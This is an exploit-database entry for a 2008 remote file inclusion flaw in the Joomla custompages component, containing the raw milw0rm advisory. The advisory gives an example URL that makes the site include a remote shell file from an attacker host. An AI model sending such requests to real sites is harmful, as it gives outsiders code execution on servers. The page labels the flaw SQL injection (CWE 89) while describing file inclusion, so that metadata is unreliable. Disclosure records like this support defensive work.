header-logo
Suggest Exploit
vendor:
custompages
by:
Sniper456
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: custompages
Affected Version From: 1
Affected Version To: 1
Patch Exists: Yes
Related CWE: N/A
CPE: a:shawn_sandy:custompages
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component custompages <= 1.0 Sql Remote file Inclusion

A remote file inclusion vulnerability exists in Joomla Component custompages version 1.0 and below. An attacker can exploit this vulnerability to include a remote file containing malicious code, resulting in arbitrary code execution on the vulnerable system.

Mitigation:

Upgrade to the latest version of Joomla Component custompages.
Source

Exploit-DB raw data:

@ JOOmla Component custompages <= 1.0 Sql Remote file Inclusion


Author:Sniper456

Contact:Sniper456[attt]gmail.com

Greetss: My chilean people

Developer: Shawn Sandy

License:Other open source / Free license

Dork: 8=====B !           =)

**Bug:

http://www.target.com/index.php?option=com_custompages&cpage=URL

**Example

http://www.target.com/index.php?option=com_custompages&cpage=http://atackweeb.cl/colocoloshell.txt?

side note:

 <name>custompages</name>
 <creationDate>06/11/2006</creationDate>
 <author>Shawn Sandy</author>
 <copyright>Copyright 2006 - Shawn Sandy</copyright>
 <license>License</license>
 <authorEmail>shawnsandy04@gmail.com</authorEmail>
 <authorUrl>www.sstreamtv.com</authorUrl>
 <version>1.1</version>

# milw0rm.com [2008-03-22]